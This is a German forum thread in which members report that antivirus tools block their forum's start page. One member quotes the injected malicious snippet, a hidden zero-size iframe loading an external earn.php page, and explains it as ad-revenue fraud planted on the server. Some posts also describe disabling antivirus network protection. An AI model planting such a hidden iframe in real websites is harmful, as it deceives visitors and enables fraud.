• moin,

    eine frage: wenn ich die seite des forums aufrufe bekomme ich diese ansage von meinem virenscanner:

    JS:Redirector-ALH [Trj]

    nur wenn ich meinen scanner abschalte ,kann ich die forumsseite anklicken!!!

    habt ihr auch die probleme, habe meinen rechner gescannt ,habe nichst auf dem rechner drauf!!!!

    gruss
    frank

  • moin,

    so eben nochmal gescannt:

    Avast sagt:

    Infektion blockiert
    URL: https://www.mini-forum.de/
    Infektion: JS:Redirector-ALH [Trj]


    hoffe ein admin liest mit,,auf jeden fall script virus oder so,habe mal gegoogelt,

    gruss
    frank

    habt ihr auch probleme die seite aufzurufen.beim laden sagt mit firefox,

    Big Server Load, Please wait 4seconds...

    ich komme nur auf die seite wenn ich scanner abschalte,

    so bin erstmal weg,,mal sehen was passiert!

  • Okay, das riecht komisch:


    Was passieren soll ist, das folgendes in die Seite eingebettet wird:

    Zitat

    <iframe src="http://rr.je/earn.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    Da wird also bei jedem Aufruf der Startseite des Forums ein externer Frame eingebaut, und dann auf die eigentliche Startseite weitergeleitet.

    Immerhin bedankt sich derjenige, der an der Einbettung verdient, ordentlich:

    :D

    Ähem, Admins? Handeln!

    Grüße
    Andreas

    irgendwas ist ja immer...

  • hi,

    hab ich recht?
    kenn mich zwar nicht so aus,aber irgend etwas ist komisch an der seite,oder?

    bin mal gespannt,gut das ich aktuellen virenscanner habe :D

    duck und wech

  • Virenscanner ist da eigentlich die falsche Baustelle, da wird auf deinem Rechner nichts infiziert. Da hat halt ein dritter Zugriff auf den Forenserver und ein Schnipsel eingebaut, so daß er bei jeden Zugriff auf die Startseite Geld durch (unsichtbare) Aufrufe von Werbung verdient.

    Grüße
    Andreas

    irgendwas ist ja immer...

  • kann sein, das sich da inzwischen was getan hat?
    heute vormittag hatte ich das mit safari aufm mac im büro auch,
    inzwischen hier zu hause kommt der big server load nicht mehr
    und das forum ist sofort am start.

    ------------------------------------------------------------
    You're only supposed to blow the bloody doors off!
    ------------------------------------------------------------
    mit minimalen grüßen
    uwe

    webmaster | grafik @Miniscene Unterfranken

    mail to: uwe[ät]miniscene-unterfranken.de

    Team IMM 2024

  • korrektur meinerseits. hab grad nen reload gemacht und
    die meldung "big server load" ist doch noch vorhanden.

    ------------------------------------------------------------
    You're only supposed to blow the bloody doors off!
    ------------------------------------------------------------
    mit minimalen grüßen
    uwe

    webmaster | grafik @Miniscene Unterfranken

    mail to: uwe[ät]miniscene-unterfranken.de

    Team IMM 2024

  • hi,

    also mein avast meldet und sperrt sofort die seite,nur wenn ich deaktiviere dann komm ich auf die seite!

    gruss
    frank

    Das wird auch so lange so bleiben, bis ein Admin den Trojaner entfernt und per E-Mail Avast über die Desinfizierung informiert hat.

    Durch die vielen Vierenwarnung, die online direkt an Avast gemeldet werden, hat Avast die Forums URL automatisch auf eine "Blacklist" gesetzt und beim nächsten Vieren-Update blockiert avast den Zugang zur Startseite.

    Umgehen lässt sich die Blockade nur durch de-aktivierung des Netztwerk-Schutzes in avast :rolleyes:

    Wenn man eine gescheite Firewall hat, sollte das kein Problem sein, wenn man entsprechend "vorsichtig" surft ;)

    Gruß, Diddi

  • Norten macht auch Alarm wenn ich die Seite aufrufe !!

    Wenn ich aufrufe kommt folgende Zeile:

    Big Server Load, Please wait 4seconds...

    Anzeige bei Norton:

    Trojan.Webkit!html
    Risk Level 1: Very Low
    summary technical details removal Printer Friendly Page|Rate this pageDiscovered: October 9, 2007
    Updated: October 9, 2007 4:42:01 PM
    Type: Trojan
    Infection Length: Varies
    Systems Affected: Linux, Mac OS X, Solaris, Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
    Trojan.Webkit!html is a generic detection for HTML files containing malicious code to redirect users to malicious Web servers.


    Antivirus Protection Dates
    Initial Rapid Release version October 22, 2007 revision 040
    Latest Rapid Release version August 15, 2013 revision 019
    Initial Daily Certified version October 10, 2007 revision 003
    Latest Daily Certified version August 15, 2013 revision 022
    Initial Weekly Certified release date October 10, 2007
    Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.
    Threat Assessment
    Wild
    Wild Level: Low
    Number of Infections: 0 - 49
    Number of Sites: 0 - 2
    Geographical Distribution: Low
    Threat Containment: Easy
    Removal: Easy
    Damage
    Damage Level: Low
    Distribution
    Distribution Level: Low
    Writeup By: Ka Chun Leung
    Summary| Technical Details| Removal

    :mad::eek:
    Gruß
    Michael

Jetzt mitmachen!

Du hast noch kein Benutzerkonto auf unserer Seite? Registriere dich kostenlos und nimm an unserer Community teil!